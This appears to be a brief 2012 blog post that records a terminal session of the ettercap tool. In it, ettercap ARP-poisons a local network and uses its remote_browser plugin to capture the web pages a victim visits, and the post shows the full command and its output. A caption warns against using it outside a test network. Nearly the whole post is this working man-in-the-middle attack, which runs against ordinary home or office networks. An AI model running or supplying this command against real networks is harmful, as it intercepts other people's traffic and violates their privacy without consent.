>interface=en0
>echo $interface
en0
>ip=192.168.15.18
>echo $ip
192.168.15.18
>sudo ettercap -T -Q -M arp:remote -i $interface /$ip/ // -P remote_browser
Password:
ettercap 0.7.4.1 copyright 2001-2011 ALoR & NaGA
Listening on en0... (Ethernet)
en0 -> 7C:D1:C3:E9:51:23 192.168.15.18 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
40 protocol dissectors
55 ports monitored
7587 mac vendor fingerprint
1766 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
1 hosts added to the hosts list...
ARP poisoning victims:
GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Activating remote_browser plugin...
suff .htm
REMOTE COMMAND: mozilla -remote openurl(http://interface.eyecon.ro/demos/drag.html)
REMOTE COMMAND: mozilla -remote openurl(http://en.wikipedia.org/)
suff .php
Press q to quit properly!
Closing text interface...
ARP poisoner deactivated.
RE-ARPing the victims...
Unified sniffing was stopped.
>
Thursday, December 20, 2012
Ettercap using browser plugin. Do not do this outside of test network
Subscribe to:
Posts (Atom)